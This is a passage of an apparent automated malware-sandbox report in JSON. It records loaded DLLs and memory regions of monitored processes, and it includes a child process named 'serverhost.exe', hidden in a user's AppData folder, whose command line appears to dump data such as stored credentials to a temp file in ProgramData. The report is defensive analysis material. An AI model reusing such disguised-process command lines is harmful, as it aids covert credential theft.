}, "end_va": 1814798335, "entry_point": 1814439231, "filename": "\\Windows\\System32\\d2d1.dll", "id": "region_2044", "name": "d2d1.dll", "norm_filename": "c:\\windows\\system32\\d2d1.dll", "region_type": "memory_mapped_file", "start_va": 1814036480, "timestamp": "00:01:26.501", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1947729920, "type": "region", "version": 1 }, "end_va": 1947783167, "entry_point": 1947734496, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_2045", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1947729920, "timestamp": "00:01:26.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1966800896, "type": "region", "version": 1 }, "end_va": 1966968831, "entry_point": 1966828313, "filename": "\\Windows\\System32\\winsta.dll", "id": "region_2046", "name": "winsta.dll", "norm_filename": "c:\\windows\\system32\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1966800896, "timestamp": "00:01:26.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 48889856, "type": "region", "version": 1 }, "end_va": 49938431, "entry_point": 0, "filename": null, "id": "region_2047", "name": "private_0x0000000002ea0000", "norm_filename": null, "region_type": "private_memory", "start_va": 48889856, "timestamp": "00:01:26.512", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 51642368, "type": "region", "version": 1 }, "end_va": 52690943, "entry_point": 0, "filename": null, "id": "region_2048", "name": "private_0x0000000003140000", "norm_filename": null, "region_type": "private_memory", "start_va": 51642368, "timestamp": "00:01:26.512", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_2049", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:01:26.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_2050", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:01:26.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1903099904, "type": "region", "version": 1 }, "end_va": 1903636479, "entry_point": 1903170480, "filename": "\\Windows\\System32\\dxgi.dll", "id": "region_2051", "name": "dxgi.dll", "norm_filename": "c:\\windows\\system32\\dxgi.dll", "region_type": "memory_mapped_file", "start_va": 1903099904, "timestamp": "00:01:26.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 6098943, "entry_point": 0, "filename": null, "id": "region_2052", "name": "private_0x00000000005d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6094848, "timestamp": "00:01:26.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1991495679, "entry_point": 1989810151, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_2053", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:26.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1967915008, "type": "region", "version": 1 }, "end_va": 1968074751, "entry_point": 1967937721, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_2054", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1967915008, "timestamp": "00:01:26.517", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970151423, "entry_point": 1970082881, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_2055", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:01:26.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 49938432, "type": "region", "version": 1 }, "end_va": 50987007, "entry_point": 0, "filename": null, "id": "region_2056", "name": "private_0x0000000002fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49938432, "timestamp": "00:01:26.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 6189055, "entry_point": 0, "filename": null, "id": "region_2057", "name": "pagefile_0x00000000005e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6160384, "timestamp": "00:01:26.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 6234111, "entry_point": 0, "filename": null, "id": "region_2058", "name": "pagefile_0x00000000005f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6225920, "timestamp": "00:01:26.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 52690944, "type": "region", "version": 1 }, "end_va": 56831999, "entry_point": 0, "filename": null, "id": "region_2059", "name": "pagefile_0x0000000003240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 52690944, "timestamp": "00:01:26.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1968111616, "type": "region", "version": 1 }, "end_va": 1968295935, "entry_point": 1968122221, "filename": "\\Windows\\System32\\wintrust.dll", "id": "region_2060", "name": "wintrust.dll", "norm_filename": "c:\\windows\\system32\\wintrust.dll", "region_type": "memory_mapped_file", "start_va": 1968111616, "timestamp": "00:01:26.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1970065407, "entry_point": 1968903562, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_2061", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:01:26.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967521792, "type": "region", "version": 1 }, "end_va": 1967570943, "entry_point": 1967530894, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_2062", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1967521792, "timestamp": "00:01:26.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 914948096, "type": "region", "version": 1 }, "end_va": 915013631, "entry_point": 0, "filename": null, "id": "region_2066", "name": "private_0x0000000036890000", "norm_filename": null, "region_type": "private_memory", "start_va": 914948096, "timestamp": "00:01:26.536", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3608576, "start_va": 1809580032, "type": "region", "version": 1 }, "end_va": 1813188607, "entry_point": 1809580032, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\1033\\MSOINTL.DLL", "id": "region_2067", "name": "msointl.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\1033\\msointl.dll", "region_type": "memory_mapped_file", "start_va": 1809580032, "timestamp": "00:01:26.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1376256, "start_va": 56885248, "type": "region", "version": 1 }, "end_va": 58261503, "entry_point": 0, "filename": null, "id": "region_2068", "name": "private_0x0000000003640000", "norm_filename": null, "region_type": "private_memory", "start_va": 56885248, "timestamp": "00:01:26.543", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 741376, "start_va": 1674313728, "type": "region", "version": 1 }, "end_va": 1675055103, "entry_point": 1674615093, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\ADAL.DLL", "id": "region_2069", "name": "adal.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\adal.dll", "region_type": "memory_mapped_file", "start_va": 1674313728, "timestamp": "00:01:26.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 7274496, "type": "region", "version": 1 }, "end_va": 7278591, "entry_point": 0, "filename": null, "id": "region_2070", "name": "pagefile_0x00000000006f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7274496, "timestamp": "00:01:26.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 360448, "start_va": 1906376704, "type": "region", "version": 1 }, "end_va": 1906737151, "entry_point": 1906381748, "filename": "\\Windows\\System32\\winhttp.dll", "id": "region_2071", "name": "winhttp.dll", "norm_filename": "c:\\windows\\system32\\winhttp.dll", "region_type": "memory_mapped_file", "start_va": 1906376704, "timestamp": "00:01:26.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1906049024, "type": "region", "version": 1 }, "end_va": 1906372607, "entry_point": 1906054226, "filename": "\\Windows\\System32\\webio.dll", "id": "region_2072", "name": "webio.dll", "norm_filename": "c:\\windows\\system32\\webio.dll", "region_type": "memory_mapped_file", "start_va": 1906049024, "timestamp": "00:01:26.550", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1996750848, "type": "region", "version": 1 }, "end_va": 1997754367, "entry_point": 1996757093, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_2073", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1996750848, "timestamp": "00:01:26.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1995440128, "type": "region", "version": 1 }, "end_va": 1996709887, "entry_point": 1995447093, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_2074", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1995440128, "timestamp": "00:01:26.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1992687616, "type": "region", "version": 1 }, "end_va": 1994764287, "entry_point": 1992696537, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_2075", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1992687616, "timestamp": "00:01:26.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1966080000, "type": "region", "version": 1 }, "end_va": 1966112767, "entry_point": 1966084329, "filename": "\\Windows\\System32\\secur32.dll", "id": "region_2076", "name": "secur32.dll", "norm_filename": "c:\\windows\\system32\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1966080000, "timestamp": "00:01:26.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966321663, "entry_point": 1966248889, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_2077", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:01:26.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 720896, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 36110335, "entry_point": 0, "filename": null, "id": "region_2078", "name": "private_0x00000000021c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35389440, "timestamp": "00:01:26.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1867513856, "type": "region", "version": 1 }, "end_va": 1867608063, "entry_point": 1867519305, "filename": "\\Windows\\System32\\davclnt.dll", "id": "region_2079", "name": "davclnt.dll", "norm_filename": "c:\\windows\\system32\\davclnt.dll", "region_type": "memory_mapped_file", "start_va": 1867513856, "timestamp": "00:01:26.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1867448320, "type": "region", "version": 1 }, "end_va": 1867481087, "entry_point": 1867463815, "filename": "\\Windows\\System32\\davhlpr.dll", "id": "region_2081", "name": "davhlpr.dll", "norm_filename": "c:\\windows\\system32\\davhlpr.dll", "region_type": "memory_mapped_file", "start_va": 1867448320, "timestamp": "00:01:26.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 10354688, "type": "region", "version": 1 }, "end_va": 10371071, "entry_point": 0, "filename": null, "id": "region_2082", "name": "pagefile_0x00000000009e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10354688, "timestamp": "00:01:26.569", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 58261504, "type": "region", "version": 1 }, "end_va": 66650111, "entry_point": 0, "filename": null, "id": "region_2083", "name": "pagefile_0x0000000003790000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 58261504, "timestamp": "00:01:26.570", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 80654336, "start_va": 1678835712, "type": "region", "version": 1 }, "end_va": 1759490047, "entry_point": 1678835712, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSORES.DLL", "id": "region_2084", "name": "msores.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\msores.dll", "region_type": "memory_mapped_file", "start_va": 1678835712, "timestamp": "00:01:26.575", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1672478720, "type": "region", "version": 1 }, "end_va": 1672663039, "entry_point": 1672569564, "filename": "\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", "id": "region_2085", "name": "osppc.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll", "region_type": "memory_mapped_file", "start_va": 1672478720, "timestamp": "00:01:26.578", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 10420224, "type": "region", "version": 1 }, "end_va": 10424319, "entry_point": 0, "filename": null, "id": "region_2086", "name": "pagefile_0x00000000009f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10420224, "timestamp": "00:01:26.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1987522559, "entry_point": 1986995154, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_2087", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:01:26.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 10485760, "type": "region", "version": 1 }, "end_va": 10489855, "entry_point": 0, "filename": null, "id": "region_2088", "name": "pagefile_0x0000000000a00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10485760, "timestamp": "00:01:26.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1671168, "start_va": 1829240832, "type": "region", "version": 1 }, "end_va": 1830911999, "entry_point": 1829240832, "filename": "\\PROGRA~1\\MICROS~1\\Office15\\MSPST32.DLL", "id": "region_2096", "name": "mspst32.dll", "norm_filename": "c:\\progra~1\\micros~1\\office15\\mspst32.dll", "region_type": "memory_mapped_file", "start_va": 1829240832, "timestamp": "00:01:26.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 56885248, "type": "region", "version": 1 }, "end_va": 57933823, "entry_point": 0, "filename": null, "id": "region_2105", "name": "pagefile_0x0000000003640000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 56885248, "timestamp": "00:01:27.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 58195968, "type": "region", "version": 1 }, "end_va": 58261503, "entry_point": 0, "filename": null, "id": "region_2106", "name": "private_0x0000000003780000", "norm_filename": null, "region_type": "private_memory", "start_va": 58195968, "timestamp": "00:01:27.089", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 86573056, "type": "region", "version": 1 }, "end_va": 87621631, "entry_point": 0, "filename": null, "id": "region_2107", "name": "private_0x0000000005290000", "norm_filename": null, "region_type": "private_memory", "start_va": 86573056, "timestamp": "00:01:27.089", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147315712, "type": "region", "version": 1 }, "end_va": 2147319807, "entry_point": 0, "filename": null, "id": "region_2108", "name": "private_0x000000007ffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147315712, "timestamp": "00:01:27.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 1953759232, "type": "region", "version": 1 }, "end_va": 1953910783, "entry_point": 1953770353, "filename": "\\Windows\\System32\\powrprof.dll", "id": "region_2110", "name": "powrprof.dll", "norm_filename": "c:\\windows\\system32\\powrprof.dll", "region_type": "memory_mapped_file", "start_va": 1953759232, "timestamp": "00:01:27.133", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1922760704, "type": "region", "version": 1 }, "end_va": 1923006463, "entry_point": 1922773129, "filename": "\\Windows\\System32\\oleacc.dll", "id": "region_2116", "name": "oleacc.dll", "norm_filename": "c:\\windows\\system32\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 1922760704, "timestamp": "00:01:27.183", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 5705727, "entry_point": 5701632, "filename": "\\Windows\\System32\\tzres.dll", "id": "region_2118", "name": "tzres.dll", "norm_filename": "c:\\windows\\system32\\tzres.dll", "region_type": "memory_mapped_file", "start_va": 5701632, "timestamp": "00:01:27.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 5705727, "entry_point": 0, "filename": null, "id": "region_2120", "name": "pagefile_0x0000000000570000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5701632, "timestamp": "00:01:27.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 372736, "start_va": 1856962560, "type": "region", "version": 1 }, "end_va": 1857335295, "entry_point": 1856962560, "filename": "\\Program Files\\Common Files\\System\\ado\\msadox.dll", "id": "region_2121", "name": "msadox.dll", "norm_filename": "c:\\program files\\common files\\system\\ado\\msadox.dll", "region_type": "memory_mapped_file", "start_va": 1856962560, "timestamp": "00:01:27.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 372736, "start_va": 1830551552, "type": "region", "version": 1 }, "end_va": 1830924287, "entry_point": 1830840042, "filename": "\\Program Files\\Common Files\\System\\ado\\msadox.dll", "id": "region_2122", "name": "msadox.dll", "norm_filename": "c:\\program files\\common files\\system\\ado\\msadox.dll", "region_type": "memory_mapped_file", "start_va": 1830551552, "timestamp": "00:01:27.277", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967108095, "entry_point": 1967069586, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_2123", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:27.305", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" /scomma \"C:\\ProgramData\\C571.tmp\"", "filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "id": "proc_14", "image_name": "serverhost.exe", "monitor_reason": "child_process", "monitored_id": 14, "origin_monitor_id": 11, "ref_parent_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000014-region_00001916-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_303", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1916", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:25.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1917", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:25.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_1918", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:01:25.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 372736, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4567039, "entry_point": 0, "filename": null, "id": "region_1919", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:25.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 12845056, "type": "region", "version": 1 }, "end_va": 12955647, "entry_point": 12852624, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exeMh.exe", "id": "region_1920", "name": "serverhost.exemh.exe", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exemh.exe", "region_type": "memory_mapped_file", "start_va": 12845056, "timestamp": "00:01:25.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, 